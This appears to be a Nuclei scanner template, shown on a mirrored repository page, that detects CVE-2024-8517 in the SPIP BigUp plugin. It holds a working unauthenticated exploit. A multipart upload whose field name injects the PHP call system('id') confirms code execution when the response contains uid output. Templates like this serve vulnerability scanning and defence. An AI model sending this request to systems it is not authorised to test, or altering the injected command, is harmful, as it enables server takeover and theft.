daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-8517.yaml

116 lines
3.5 KiB
YAML
Raw Blame History

id: CVE-2024-8517
info:
name: SPIP BigUp Plugin - Remote Code Execution
author: DhiyaneshDk
severity: critical
description: |
SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
reference:
- https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html
- https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/
- https://vulncheck.com/advisories/spip-upload-rce
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8517
cwe-id: CWE-646
epss-score: 0.00045
epss-percentile: 0.16322
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:-1224668706
fofa-query: "X-Spip-Cache"
tags: cve,cve2024,intrusive,spip,rce
flow: http(1) && http(2)
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'formulaire_action_args'
- 'spip'
condition: and
internal: true
extractors:
- type: regex
part: body
group: 1
name: formulaire
regex:
- name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"]
internal: true
- raw:
- |
POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="page"
spip_pass
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="lang"
fr
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="formulaire_action"
oubli
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="formulaire_action_args"
{{formulaire}}
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="formulaire_action_sign"
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="oubli"
{{email}}
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="nobot"
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="bigup_retrouver_fichiers"
a
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt"
Content-Type: text/plain
{{string}}
--5f02b65945d644d6a32847ab130e9586--
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 4a0a00473045022100dd534fd7eb42720fb79916d704dd57561a4fd2b4416d16c3f93cd70c6332ad63022077d670af470a43a31c6958d49d503cd7c56a25a06f1f8111e236360358ba983c:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink